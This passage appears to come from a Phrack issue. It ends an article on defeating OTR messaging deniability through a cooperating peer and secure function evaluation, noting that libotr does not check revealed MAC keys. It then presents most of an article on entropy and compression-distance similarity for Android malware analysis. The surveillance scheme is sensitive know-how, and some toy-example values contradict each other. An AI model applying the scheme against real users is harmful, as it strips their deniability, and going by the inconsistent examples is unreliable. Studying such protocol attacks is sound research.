. /
|
|
O <----- eval(C3) ----------- A /
|
|
O ----- MAC_mk(T_A) --------> A/
|
|
|
|
Please be aware that Alice will keep T_A secret. Although T_A doesn't
|
|
contain any plaintext, Alice does not want to disclose it to the observing
|
|
party. If she did, then her own deniability would also be gone.
|
|
Also, the OTR protocol mandates that Alice should send her old MAC keys in
|
|
plaintext to Bob, so that they can be considered public. If A and O wanted
|
|
to, they could do that (by computing the old MAC key again and sharing the
|
|
result). But as long as Bob doesn't check what Alice sent, she can just
|
|
send garbage. Indeed, in its current version (libotr 3.2.0), the OTR
|
|
implementation doesn't check the disclosed MAC keys. Consider the excerpt
|
|
from proto.c, line 657:
|
|
|
|
--- snip ---
|
|
/* Just skip over the revealed MAC keys, which we don't need. They
|
|
* were published for deniability of transcripts. */
|
|
bufp += reveallen; lenp -= reveallen;
|
|
--- snap ---
|
|
|
|
So Alice can safely send:
|
|
|
|
A -T_A,MAC_mk(T_A),oldmackeys=foobar-> B
|
|
|
|
------[ 4.5 - What's Left
|
|
|
|
We have seen that in a scenario where at least one party cooperates with
|
|
the attacker, deniability is non-trivial. Our construction can be extended
|
|
and adopted and we conjecture that it quite generally applies to deniable
|
|
messaging protocols.
|
|
|
|
Regarding performance: Yeah, we know that all the SFE voodoo can be quite
|
|
expensive. Especially modular exponentiation in circuits is not really
|
|
cheap. However, there are ways to optimize the basic scheme we have
|
|
outlined here. If you're interested in that, you might wanna read [5] as an
|
|
introduction. Also, refer to section 4.5.2, which outlines one particular
|
|
optimization of our Diffie-Hellman-scheme. Regarding network latency: When
|
|
looking at all the crypto protocols outlined in this article (especially at
|
|
oblivious transfers), you will notice that often multiple messages need to
|
|
be exchanged. If you need 3 messages for one oblivious transfer and you
|
|
want to perform 128 oblivious transfers (for some 128-bit crypto key or
|
|
so), then you end up with 384 messages being exchanged. In terms of network
|
|
latency, that might be troublesome. However, there are two things that help
|
|
us: first, we can perform oblivious transfers in parallel (i.e. still
|
|
exchange three messages but every message now contains data for 128
|
|
oblivious transfers). We can also precompute many values and exchange them
|
|
before they are really needed (random values for instance).
|
|
|
|
---------[ 4.5.1 - FAQ
|
|
|
|
Q: This is all bullshit! I could just share my private keys with the
|
|
police, and that would also kill deniability!
|
|
|
|
Yep. And the police would then be able to impersonate you. One of our
|
|
key points is that you don't need to trust the observing party, neither
|
|
need they to trust you.
|
|
|
|
A: But the observing party won't be able to prove anything in court!
|
|
|
|
Well, yes and no. In a constitutional state you'd need to actually prove
|
|
stuff in court. Unfortunately, such states are rare. But even if you
|
|
live in such a state, then the observing party could be the judge.
|
|
|
|
Q: But all the conversations that I had before my peer cooperated with the
|
|
observing party are deniable, right?
|
|
|
|
A: Yes, unless the observing party sniffed your traffic (if you used a
|
|
decent anonymizer, this is unlikely).
|
|
|
|
Q: Wait, the observing party so far only learned that *somebody* has sent
|
|
a message. But how do they know it was the person that I tell them it
|
|
was?
|
|
|
|
Good question. This knowledge is generated during the initial key
|
|
exchange of OTR. To be precise, the observing party and the backstabber
|
|
both learn the identity of the conversation peer when he signs his
|
|
key-exchange proposal with his DSA key. The observing party also sees
|
|
that and as they track all subsequent key-exchanges, they can build a
|
|
"chain of evidence".
|
|
|
|
Q: But doesn't [4] already kill the deniability of OTR?
|
|
|
|
A: Ha, even better question! At least it attacks the strong deniability of
|
|
OTR. However, our scheme also attacks the weak deniability. Furthermore,
|
|
the attacker in [4] has far more capabilities than in our model. In [4],
|
|
the attacker is able to arbitrarily read and modify network traffic. In
|
|
our model, the attacker can rely on the cooperation with one of the two
|
|
conversation partners.
|
|
|
|
Q: OK, I'm convinced. Is there any implementation?
|
|
|
|
A: You're welcome to build one ;) See section 4.5.2 for details.
|
|
|
|
---------[ 4.5.2 - How to Implement?
|
|
|
|
If you want to implement the scheme outlined above, first of all, you need
|
|
some framework for secure function evaluation. There are a number of
|
|
implementations out there, for instance Fairplay [6] or TASTY [5]. Once you
|
|
got your SFE framework running, you need to implement all the functions
|
|
that need to be computed jointly. The Diffie-Hellman stuff is probably most
|
|
efficient when implemented using a homomorphic cryptosystem (such as
|
|
RSA or ElGamal maybe). Now you may ask: how does a multiplicatively
|
|
homomorphic scheme help us computing DH keys? Well. There's some nice
|
|
optimization, which basically reduces the modular exponentiation to a
|
|
modular multiplication:
|
|
|
|
Alice picks some random j and sends g^(ab+bj) over to the observing party.
|
|
The observing party sends g^o.
|
|
|
|
A <---- g^b ------------ B
|
|
O <------ g^(ab+j) ------ A
|
|
O -------- g^o ---------> A
|
|
|
|
Note that Bob cannot compute g^abo, because Alice's value is "blinded" with
|
|
j. Alice cannot do so neither; she doesn't know o. Bob however can compute
|
|
g^(abo+jo). Alice can compute g^jo and also g^-jo, because she knows j. If
|
|
Alice would send g^-jo to O, then O could compute
|
|
|
|
g^(abo+jo) * g^-jo = g^abo
|
|
|
|
This is only one modular multiplication. So instead of doing a whole
|
|
modular exponentiation, the circuit that Alice and the observing party
|
|
jointly compute does roughly the following:
|
|
|
|
C(o, a) = derive_keys(o*a)
|
|
|
|
Where the function derive_keys() is the OTR key derivation function
|
|
(hashing the common key in different ways to generate symmetric key
|
|
material), O's input value will look like g^(abo+jo) and A's input value
|
|
will look like g^-jo.
|
|
|
|
All the symmetric operations (hashes and block ciphers) should probably be
|
|
implemented as circuits, for instance using Fairplay. Both SFE schemes
|
|
(circuits and homomorphic crypto) can be combined using the TASTY approach.
|
|
|
|
--[ 5 - References
|
|
|
|
[1] http://www-ee.stanford.edu/~hellman/publications/24.pdf
|
|
[2] http://www.cypherpunks.ca/otr/Protocol-v2-3.0.0.html
|
|
[3] http://eprint.iacr.org/2004/175.pdf
|
|
[4] http://www.jbonneau.com/OTR_analysis.pdf
|
|
[5] http://eprint.iacr.org/2010/365.pdf
|
|
[6] http://www.pinkas.net/PAPERS/MNPS.pdf
|
|
[7] http://tinyurl.com/84z7wpu
|
|
|
|
--[ 6 - Greetingz
|
|
|
|
First of all I have to give a big shout to bruhns, who developed this stuff
|
|
together with me! There's this one person, which I'd like to say thanks for
|
|
everything (and that's quite a lot). Unfortunately, i cannot name this
|
|
person here. 291646a6d004d800b1bc61ba945c9cb46422f8ac. Also a big thanks to
|
|
Phrack staff for reading through all this and supplying me with real
|
|
helpful feedback!
|
|
|
|
Greetingz go out to the following awesome people in no particular order:
|
|
ths, fabs, joern, nowin, trapflag, jenny, twice#11
|
|
|
|
--[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x0f of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------=[ Similarities for Fun & Profit ]=------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=---------------=[ Pouik (Androguard Team) and G0rfi3ld ]=--------------=|
|
|
|=------------------=[ d@t0t0.fr / g0rfi3ld@gmail.com ]=-----------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
1/ Introduction
|
|
1.1 Complexity of a sequence
|
|
1.2 Histograms and classical Shannon Entropy
|
|
1.3 From the Classical Entropy towards Descriptional Entropy
|
|
1.4 Normalized Compression Distance (NCD)
|
|
2/ Similarities
|
|
2.1 Between two sets of elements
|
|
2.2 In a set of elements
|
|
3/ Real World: Android
|
|
3.1 Similarities between two applications
|
|
3.2 Differences between two applications
|
|
3.3 Looking for a signature in applications
|
|
4/ Conclusion
|
|
5/ References
|
|
6/ Code
|
|
|
|
|
|
--[ 1 - Introduction
|
|
|
|
How can we verify that two numerical objects are identical? It's easy, you
|
|
just have to compare all characters, one by one. But how can we say that
|
|
two numerical objects are "similar" but not identical?
|
|
|
|
Can we define a measure of "similarity", which will give ipso facto a
|
|
measure of "dissimilarity"?
|
|
|
|
But what are these numerical files that we want to analyze or compare? It
|
|
could be anything, from pictures to numerical data files. We will focus in
|
|
this work on goodware and malware, (a goodware is not a malware :). So, if
|
|
the numerical objects are software, can we define a measure of similarity
|
|
and how? And why? We will see this.
|
|
|
|
Our problem can be simply defined as: How can we choose quickly, from a set
|
|
M of known software files {m1, ..., mn}, with n >= 1, the subset of the
|
|
files of M that are the "most similar" to a target A? And how can we find
|
|
quickly interesting differences without using a direct approach like graph
|
|
isomorphism [21, 25] between two similar but different applications?
|
|
|
|
We will show you how we can use a filtering tactic to select the best (i.e.
|
|
the "most similar" to a target A) files out of the malware set M. We
|
|
propose the use of two different tactics, using the entropy as a first
|
|
filtering tactic to filter the set M and the Normalized Compression
|
|
Distance (NCD) for a second filtering tactic. We also propose a new entropy
|
|
which is a simple generalization of the classical Shannon entropy. We call
|
|
this entropy the "descriptional entropy", which to the authors knowledge,
|
|
is presented here for the first time.
|
|
|
|
While the tools that we present here are truly generic, i.e. they can be
|
|
used with any files, we will give some examples through the analysis and
|
|
comparison of Android applications.
|
|
|
|
----[ 1.1 Complexity of a sequence
|
|
|
|
We want to compare DNA sequences [24], music files or pictures [20].
|
|
We need a notion of the "complexity" of a sequence, to be able to compare
|
|
them, to sort them or to index them. But what is a complex sequence or how
|
|
do we define a complex sequence? There are lots of situations where we need
|
|
a tool to answer. To be more exact, we need a computable measure of the
|
|
complexity of a sequence, to index for example a set of files. The sequence
|
|
can be the bytes of a picture, a DNA sequence, a source code or an
|
|
executable file; in other words, whatever can be stored in a file. In this
|
|
paper, we will say sequence, for any sequence of ASCII characters.
|
|
|
|
So, can we define the "complexity" of a sequence? Let us give a toy
|
|
example, we consider the four sequences:
|
|
|
|
- S1 = "aaabbb"
|
|
- S2 = "ababab"
|
|
- S3 = "bbbaaa"
|
|
- S4 = "abbaab"
|
|
|
|
Intuition tells us that:
|
|
|
|
- S1 and S3 are more similar than S1 and S2 or S2 and S3.
|
|
- S1 is more "simple" than S2.
|
|
- S1, S2 and S3 are more "simple" than S4.
|
|
|
|
It is easy to see that S1 is the reverse of S3, so it could be interesting
|
|
for any function Comp() defined as a measure of the complexity of a
|
|
sequence to verify that Comp(S1) = Comp(S3).
|
|
|
|
----[ 1.2 Histograms and classical Shannon Entropy
|
|
|
|
Let S be a sequence of characters, with an "alphabet" of n different
|
|
symbols (generally characters). Let pi be the computed probability of
|
|
occurrence of each of the n character in S, we will call the histogram
|
|
vector Hist = {p1, ..., pn} and then the classical Shannon entropy of the
|
|
sequence S is defined by:
|
|
|
|
n
|
|
__
|
|
\
|
|
H(S)= - / pi log(pi)
|
|
|__
|
|
i=1
|
|
|
|
(where log(x) is the logarithmic function in base 10).
|
|
|
|
In our toy example, S1 = "aaabbb", S2 = "ababba" and S3 = "bbbaaa", the
|
|
alphabet is {"a", "b"}. They have a same histogram vector entropy:
|
|
|
|
Hist(S1) = Hist(S2) = Hist(S3) = {1/2, 1/2}
|
|
|
|
which will give the same entropy:
|
|
|
|
H(S1) = H(S2) = H(S3) = 1.
|
|
|
|
If we use the classical Shannon entropy H(), the equation holds as
|
|
H(S1) = H(S3). However we also have H(S1) = H(S2) which contradicts 'S1 is
|
|
more simple than S2'. So the function is not suitable.
|
|
|
|
Let's see another problem with the classical Shannon entropy: if S is a
|
|
sequence of characters with S...S a concatenation of S and H() the Shannon
|
|
entropy, then we have H(S) = H(SS) = H(SSS) = H(S...S). This is not really
|
|
good for our purposes!
|
|
|
|
We will see that we can do better with a generalization of the Shannon
|
|
entropy which we will call "Descriptional Entropy".
|
|
|
|
----[ 1.3 From the Classical Shannon Entropy towards the Descriptional
|
|
Entropy
|
|
|
|
A lot of ways to measure the complexity of a sequence have been proposed.
|
|
For example, the Lempel-Ziv complexity [29,30] is defined as the number of
|
|
different subsequences (patterns) in a sequence when we apply the LZ
|
|
algorithm.
|
|
|
|
The sequence complexity, or the complexity index, of a sequence S = s1...sn
|
|
is defined as the number of different subsequences in S [31,32].
|
|
|
|
In all cases we obtain a number which is difficult to use, or we have to
|
|
take the histogram vector. But to compare two histogram vectors of unequal
|
|
size is not easy. We propose here a new approach.
|
|
|
|
Given a complexity measure based on the count of different subsequences,
|
|
and if we have N different subsequences, we can compute the histogram
|
|
vector Hist(S) = {P1, ..., PN} for this set, with P1+...PN=1 of course. So
|
|
now we can compute the entropy of this histogram vector; we propose to call
|
|
this entropy the "Descriptional Entropy" of a sequence:
|
|
|
|
N
|
|
__
|
|
\
|
|
Hd(Hist(S))= - / Pi log(Pi)
|
|
|__
|
|
i=1
|
|
|
|
To simplify we will write Hd(S) for Hd(Hist(S)). From now we will use the
|
|
log2(x) function, i.e. the log base 2 function.
|
|
|
|
Let us show it with the toy example, again, S1 = "aaabbb", S2 = "ababba",
|
|
S3 = "bbbaaa" and S4 = "abbaab". If we choose to count all different
|
|
subsequences we will have (to simplify we neglect the "empty" sequence
|
|
which is used sometimes):
|
|
|
|
(1) For S1 = "aaabbb": the subsequence set is (in alphabetical order)
|
|
|
|
{a,aa,aaa,aaab,aaabb,aaabbb,aab,aabb,aabbb,ab,abb,abbb,b,bb,bbb}
|
|
|
|
and the histogram vector:
|
|
Hist(S1)={1/7,2/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,
|
|
1/7,2/21,1/21}.
|
|
|
|
If we sort it we have:
|
|
{1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,2/21,2/21,
|
|
1/7,1/7}
|
|
|
|
and so the descriptional entropy will be (remember: we use the base 2
|
|
logarithmic function log2(x)):
|
|
Hd(S1) = - ( 1/21 log2(1/21) x 11 + 2/21 log2(2/21) x 2 + 1/7 log2(1/7)
|
|
x 2 )
|
|
Hd(S1) = 11/21 log2(21) + 4/21 log2(21/2) + 2/7 log2(7)
|
|
Hd(S1) = 11/21 log2(21) + 4/21 log2(21) - 4/21 log2(2) + 2/7 log2(7)
|
|
Hd(S1) = 5/7 log2(21) - 4/21 log2(2) + 2/7 log2(7)
|
|
|
|
which gives:
|
|
Hd(S1) = 3.74899
|
|
|
|
|
|
(2) For S2 = "ababab": the subsequence set is (in alphabetical order):
|
|
|
|
{a,ab,aba,abab,ababa,ababab,b,ba,bab,baba,babab}
|
|
|
|
and the histogram vector:
|
|
Hist(S2)= {1/7,1/7,2/21,2/21,1/21,1/21,1/7,2/21,2/21,1/21,1/21}
|
|
|
|
If we sort it we have:
|
|
{1/21,1/21,1/21,1/21,2/21,2/21,2/21,2/21,1/7,1/7,1/7}
|
|
|
|
and the descriptional entropy will be:
|
|
Hd(S2) = 3 log2(7) / 7 + 8 log2(21/2) / 21 + 4 log2(21) / 21
|
|
|
|
which gives:
|
|
Hd(S2) = 3.3321
|
|
|
|
(3) For S3 = "bbbaaa": the subsequence set is (in alphabetical order)
|
|
|
|
{a,aa,aaa,aaab,aaabb,aaabbb,aab,aabb,aabbb,ab,abb,abbb,b,bb,bbb}
|
|
|
|
and the histogram vector:
|
|
Hist(S3)={1/7,2/21,1/21,1/7,1/21,1/21,1/21,2/21,1/21,1/21,1/21,
|
|
1/21,1/21,1/21,1/21}
|
|
|
|
If components are sorted we have:
|
|
{1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,2/21,2/21,
|
|
1/7,1/7}
|
|
|
|
and the descriptional entropy will be:
|
|
Hd(S3) = 2 log2(7))/7 + 4 log2(21/2))/ 21 + 11 log2(21)/21
|
|
|
|
which gives:
|
|
Hd(S3) = 3.74899
|
|
|
|
(4) For S4 = "abbaab": the subsequence set is (in alphabetical order)
|
|
|
|
{a,aa,aab,ab,abb,abba,abbaa,abbaab,b,ba,baa,baab,bb,bba,bbaa,bbaab}
|
|
|
|
and the histogram vector:
|
|
Hist(S4) = {1/7,1/21,1/21,2/21,1/21,1/21,1/21,1/21,1/7,1/21,
|
|
1/21,1/21,1/21,1/21,1/21,1/21}
|
|
|
|
|
|
If components are sorted we have:
|
|
{1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,
|
|
2/21,1/7,1/7}
|
|
|
|
and the descriptional entropy will be:
|
|
Hd(S4) = 2 log2(7) / 7 + 2 log2(21/2) / 21 + 13 log(21) / 21
|
|
|
|
which gives:
|
|
Hd(S4) = 3.84423
|
|
|
|
So, we have:
|
|
|
|
Hd(S2) = 3.3321 < Hd(S1) = Hd(S3) = 3.74899 < Hd(S4) = 3.84423.
|
|
|
|
The result Hd(S1) = Hd(S3) = 3.74899 is expected. However, the result
|
|
Hd(S2) = 3.3321 < Hd(S1) is a little bit surprising, but the whole set of
|
|
inequalities is correct. S4 is more "complex" than S1, S2 and S3.
|
|
|
|
Let us give another simple example, if we choose S5 = "bbbbbaaaaa" and
|
|
S6 = S5S5 = "bbbbbaaaaabbbbbaaaaa". We will have:
|
|
|
|
Hd(S5) = 4.82265 and Hd(S6) = 6.68825,
|
|
|
|
and it is not so difficult to prove that:
|
|
|
|
for any sequence S:
|
|
Hd(S) < Hd(SS) < Hd(SSS) < Hd(S......S).
|
|
|
|
This sounds good :)
|
|
|
|
However there is a drawback since for a very long sequence S the
|
|
(practical) computational complexity of the computation of Hd(S) is not
|
|
cheap. Well, it's true, of course. We could probably find a fast(er)
|
|
algorithm, based for example on some variation of the Aho-Corasick,
|
|
Boyer-Moore or Knuth-Morris-Pratt algorithms. We can also say that we only
|
|
consider subsequences of length bounded by a suitable integer k.
|
|
|
|
----[ 1.4 Normalized Compression Distance (NCD)
|
|
|
|
The Kolmogorov complexity is a very interesting concept and it has a lot of
|
|
applications [18,23]. We present here this concept to explain the power of
|
|
Normalized Compression Distance (NCD).
|
|
|
|
Let us cite Wikipedia [26]: "In algorithmic information theory (a subfield
|
|
of computer science), the Kolmogorov complexity of an object, such as a
|
|
piece of text, is a measure of the computational resources needed to
|
|
specify the object. It is named after Soviet Russian mathematician Andrey
|
|
Kolmogorov. Kolmogorov complexity is also known as descriptive complexity,
|
|
Kolmogorov Chaitin complexity, algorithmic entropy, or program-size
|
|
complexity."
|
|
|
|
Well, it is a very good abstract. Unfortunately, The Kolmogorov complexity
|
|
K(S) of a sequence S is not computable, so we can just approximate it.
|
|
The use of any compression algorithm gives a trivial and evident upper
|
|
bound of K(S). Read the book [22] for a deep and modern presentation and
|
|
for applications. (Yes there are applications).
|
|
|
|
We switch now to the NCD, which is always computable.
|
|
|
|
To be able to use the Kolmogorov complexity we need to extend the
|
|
informational distance to have a normalized value which indicates the
|
|
similarities or dissimilarities between two elements/strings. Let us recall
|
|
what a distance is.
|
|
|
|
Wikipedia says: "...a distance function on a given set M is a
|
|
function d: MxM -> R, the set of real numbers, that
|
|
satisfies the following conditions:
|
|
|
|
a) d(x,y) >= 0, and d(x,y) = 0 if and only if x = y. (Distance is
|
|
positive between two different points, and is zero precisely from a
|
|
point to itself.)
|
|
b) It is symmetric: d(x,y) = d(y,x). (The distance between x and y is
|
|
the same in either direction.)
|
|
c) It satisfies the triangle inequality: d(x,z) <= d(x,y) + d(y,z).
|
|
(The distance between two points is the shortest distance along any
|
|
path).
|
|
|
|
Such a distance function is known as a metric."
|
|
|
|
Suppose we have two sequences x and y. We consider the concatenated
|
|
sequence xy, and a compressor algorithm Comp with L(Comp(S)) the length of
|
|
the compressed string, i.e. the number of bytes of the compressed string.
|
|
|
|
The main idea of the NCD [17,33] is that L(Comp(xy)) will be almost equal
|
|
to L(Comp(x)) if x = y. And L(Comp(xy)) will be close to L(Comp(x)) if x
|
|
and y are similar without being equal.
|
|
|
|
Let us give now the definition of dNCD(x,y):
|
|
|
|
|
|
(L(Comp(x|y)) - min{L(Comp(x)), L(Comp(y))})
|
|
- dNCD(x, y) = -------------------------------------------------
|
|
max{L(Comp(x)), L(Comp(y))}
|
|
|
|
|
|
This formula returns a value from 0.0 (maximally similar) to 1.0 (maximally
|
|
dissimilar). 1.0? Oh yes if the compressor works correctly, but practically
|
|
we can manage this.
|
|
|
|
--[ 2 - Similarities
|
|
|
|
In the next two sections, we will present two algorithms which can be used
|
|
with any set of elements. Elsim (included in the code archive at the end of
|
|
this paper) is our implementation of those algorithms. It is open source
|
|
software (LGPL), and with it you can compute similarities between any
|
|
"described" elements :)
|
|
|
|
----[ 2.1 Between 2 sets of elements
|
|
|
|
In this part we will describe how we can create a generic algorithm to
|
|
search the similarities between 2 sets of elements. This algorithm can be
|
|
used to compare all kind of elements if you are able to find a correct way
|
|
to represent your data.
|
|
|
|
For the comparison of our data, we will use the NCD, thus indirectly the
|
|
Kolmogorov complexity. One of the major drawbacks [16] of the compression
|
|
is the "time" required :) The tool can be powerful, but if you use a
|
|
compression algorithm like LZMA, you are limited to "hello world" problems
|
|
due to the speed of the compression. You need to choose carefully your
|
|
(lossless) compressor.
|
|
|
|
A compressor C is "normal" if the following properties (inequalities) are
|
|
satisfied [17]:
|
|
|
|
1) Idempotency: C(xx) = C(x), and C(E) = 0,
|
|
where E is the empty string.
|
|
2) Monotonicity: C(xy) >= C(x).
|
|
3) Symmetry: C(xy) = C(yx).
|
|
4) Distributivity: C(xy) + C(z) <= C(xz) + C(yz).
|
|
|
|
The important theorem from [18] reveals the power of the dNCD distance:
|
|
|
|
"if the compressor C is normal, then the dNCD is a normalized admissible
|
|
distance satisfying the metric inequalities that is, a similarity metric."
|
|
|
|
With this theorem, we can use the NCD as a simple tool to measure the
|
|
similarity between elements.
|
|
|
|
We have performed tests on different compressors to test them in respect to
|
|
both the previous properties and their speed. If the algorithm is too slow
|
|
it will be really useless for practical purposes. We chose to compress
|
|
random signatures (see 3.1) because it's close to our application domain
|
|
(see 3).
|
|
|
|
##########################################################################
|
|
Property | Number of success | size of final compression | speed (seconds)
|
|
##########################################################################
|
|
d@t0t0:~/elsim$ ./tests/test_similarity.py
|
|
* LZMA
|
|
Idempotency 0/9 1167 1.82118797
|
|
Monotonicity 72/72 13258 9.40736294
|
|
Symetry 72/72 17380 9.32561111
|
|
Distributivity 504/504 214466 133.67427087
|
|
|
|
* BZ2
|
|
Idempotency 0/9 1947 0.00075889
|
|
Monotonicity 72/72 18248 0.00626206
|
|
Symetry 72/72 221744 0.00735211
|
|
Distributivity 504/504 279944 0.09816098
|
|
|
|
* ZLIB
|
|
Idempotency 0/9 1073 0.00033116
|
|
Monotonicity 72/72 11850 0.00224590
|
|
Symetry 72/72 15348 0.00276113
|
|
Distributivity 504/504 190386 0.03468490
|
|
|
|
* XZ
|
|
Idempotency 0/9 1900 0.55278206
|
|
Monotonicity 72/72 17544 4.41346812
|
|
Symetry 72/72 21008 4.35566306
|
|
Distributivity 504/504 269864 61.70975709
|
|
|
|
* VCBLOCKSORT
|
|
Idempotency 0/9 8129 0.00140786
|
|
Monotonicity 72/72 86960 0.01695490
|
|
Symetry 10/72 115168 0.02190304
|
|
Distributivity 504/504 1414896 0.21149492
|
|
|
|
* SNAPPY
|
|
Idempotency 0/9 1153 0.00009203
|
|
Monotonicity 72/72 12952 0.00057387
|
|
Symetry 72/72 17184 0.00059295
|
|
Distributivity 504/504 210952 0.01117182
|
|
###########################################################################
|
|
|
|
Snappy [19] is really fast and respects, as do the others, the four
|
|
conditions. It is interesting to see that the first property will never be
|
|
satisfied by the NCD. This happens because in practice it is impossible to
|
|
obtain those conditions even if we have close results (which is why the
|
|
algorithm works :).
|
|
|
|
It is possible to execute the similarity library in Elsim to use
|
|
independently the Kolmogorov complexity and the NCD:
|
|
|
|
###########################################
|
|
In [1]: from elsim.similarity import similarity
|
|
In [2]: s =
|
|
similarity.SIMILARITY("./elsim/similarity/libsimilarity/libsimilarity.so")
|
|
|
|
// change the type of compressor (bzip2)
|
|
In [3]: s.set_compress_type( similarity.BZ2_COMPRESS )
|
|
// Get the kolmogorov complexity (by using the compressor, so this function
|
|
// returns the length of the compression
|
|
In [4]: s.kolmogorov("W00T W00T PHRACK")
|
|
Out[4]: (52L, 0)
|
|
|
|
// Get the similarity distance between two strings
|
|
In [5]: s.ncd("W00T W00T PHRACK", "W00T W00T PHRACK")
|
|
Out[5]: (0.057692307978868484, 0)
|
|
In [6]: s.ncd("W00T W00T PHRACK", "W00T W00T PHRACK STAFF")
|
|
Out[6]: (0.17543859779834747, 0)
|
|
In [7]: s.ncd("W00T W00T PHRACK", "HELLO WORLD")
|
|
Out[7]: (0.23076923191547394, 0)
|
|
// As you can see :
|
|
// - the elements of the first comparison are closer
|
|
// than the elements of the second comparison
|
|
// - the elements of the second comparison are closer
|
|
// than the elements of the third comparison
|
|
// - the result of the first comparison is not 0, that is why
|
|
// we don't respect the first property but practically it works
|
|
// because we are not far from 0
|
|
|
|
// change the type of compressor (Snappy)
|
|
In [8]: s.set_compress_type( similarity.SNAPPY_COMPRESS )
|
|
In [9]: s.ncd("W00T W00T PHRACK", "W00T W00T PHRACK")
|
|
Out[9]: (0.6666666865348816, 0)
|
|
In [10]: s.ncd("W00T W00T PHRACK", "W00T W00T PHRACK STAFF")
|
|
Out[10]: (0.6818181872367859, 0)
|
|
In [11]: s.ncd("W00T W00T PHRACK", "HELLO WORLD")
|
|
Out[11]: (0.7777777910232544, 0)
|
|
|
|
// As you can see, Snappy is very bad with such kind of strings, even if
|
|
// the algorithm respects the dissimilarities between the comparison.
|
|
|
|
// If we test this compressor with longer strings, and strings of
|
|
// signatures (3.1), we have better results:
|
|
In [12]: s.ncd("B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]"\
|
|
"B[GP1]",
|
|
"B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]B[GP1]")
|
|
Out[12]: (0.0784313753247261, 0)
|
|
|
|
In [13]: s.ncd("B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]"\
|
|
"B[GP1]",
|
|
"B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]")
|
|
Out[13]: (0.11764705926179886, 0)
|
|
|
|
In [14]: s.ncd("B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]"\
|
|
"B[GP1]",
|
|
"B[G]B[SGIGF0]B[RP1G]B[SP1I]B[SG]B[SSGP0]B[F1]B[P0SSGR]B[F1]"\
|
|
"B[SSSI]B[RF1P0R]B[GSP0RP0P0]B[GI]B[P1]B[I]B[GP1S]")
|
|
Out[14]: (0.9270833134651184, 0)
|
|
|
|
###########################################
|
|
|
|
Snappy maybe the fastest algorithm but its rate compression is the worst.
|
|
However, it is not of particular importance. Why? Because it is not a
|
|
problem if the properties are respected. Moreover if you want an end value
|
|
which respects more the idea of similarities, you can still switch to some
|
|
other compressor, such as ZLIB, LZMA or BZ2.
|
|
|
|
The first thing to do is to describe our "basic" element which will be used
|
|
for a comparison. An element is composed of:
|
|
- a string
|
|
- a hash
|
|
|
|
Oh wait, that's all? Yes, we need to compare strings and not other things.
|
|
But the strings themselves will highly depend of your similarity problem.
|
|
For example, if your problem is to compare two binaries, it's a bad idea to
|
|
compare the listings corresponding to a specific function. You need to find
|
|
the best way to transform your data into suitable strings, and it's
|
|
probably the most difficult part. Of course it is not our job in this
|
|
article:) It is not easy to transform your data to a string and it will be
|
|
specific to each problem. For example, if your data is a chemical molecule
|
|
you need probably to use SMILES to convert the structure to an ASCII string
|
|
[34].
|
|
|
|
Remember that you can't compare elements that easily, you really need a
|
|
transformation because the Kolmogorov complexity is not magical. Using it
|
|
requires the normalization of your data. Finally, the hash is only used to
|
|
quickly remove the identical elements.
|
|
|
|
The algorithm is the following one:
|
|
|
|
- input: A:set(), B:set()
|
|
where A and B are sets of elements
|
|
|
|
- output: I:set(), S:set(), N:set(), D:set(), Sk:set()
|
|
where I: identical elements, S: similar elements, N: new elements,
|
|
D: deleted elements, Sk: skipped elements
|
|
|
|
- Sk: Skipped elements by using a "filtering" function (helpful if we
|
|
wish to skip some elements from a set (small size, known element from
|
|
a library, etc.)
|
|
|
|
- Identify internal identical elements in each set
|
|
|
|
- I: Identify "identical" elements by the intersection of A and B
|
|
|
|
- Get all others elements by removing identical elements
|
|
|
|
- Perform the "NCD" between each element of A and B
|
|
|
|
- S: "Sort" all similarities elements by using a threshold
|
|
|
|
- N,D: Get all new/deleted elements if they are not present in one of
|
|
the previous sets
|
|
|
|
The following diagram describes this algorithm:
|
|
|
|
|
|
|--A--| |--B--|
|
|
| A1 | | B1 |
|
|
| A2 | | B2 |
|
|
| A3 | | B3 |
|
|
|--An-| |--Bn-|
|
|
| |---------| |
|
|
|- --->|FILTERING|<-----|
|
|
|---------|
|
|
| |
|
|
| |--------->|Sk|
|
|
|
|
|
| |---------|
|
|
|----->|IDENTICAL|------>|I|
|
|
|---------|
|
|
|
|
|
|
|
|
| |---|---use-->|Kolmogorov|
|
|
|---->|NCD|
|
|
|---|
|
|
|
|
|
|
|
|
|
|
|
| |---------|-->|Threshold|
|
|
|-------->| SORTING |
|
|
|---------|
|
|
|
|
|
|
|
|
/|\
|
|
/ | \
|
|
/ | \
|
|
/ | \
|
|
/ | \
|
|
/ | \
|
|
|N|<------------/ | \-------->|D|
|
|
|
|
|
|---->|S|
|
|
|
|
|
|
Moreover we can calculate a similarity "score" using the number of
|
|
identical elements and the value of the similar elements.
|
|
|
|
Here is a simple example showing you how it is possible to use the
|
|
algorithm (elsim_text.py). In this case, it's used to compare two plain
|
|
text files. We modified the COPYING.LESSER text by changing the order of
|
|
few paragraphs and removing (or adding) words:
|
|
|
|
###########################################
|
|
ds@t0t0:~/elsim$ ./tests/example_text_sim.py -i
|
|
examples/text/COPYING.LESSER examples/text/COPYING.LESSER.MODIF_REORDER
|
|
Elements:
|
|
IDENTICAL: 106
|
|
SIMILAR: 2
|
|
NEW: 0
|
|
DELETED: 0
|
|
SKIPPED: 2
|
|
--> sentences: 99.783060% of similarities
|
|
###########################################
|
|
|
|
As you can see, with a few modifications the two files are maximally
|
|
similar even if the elements are not at the same place. And if you add some
|
|
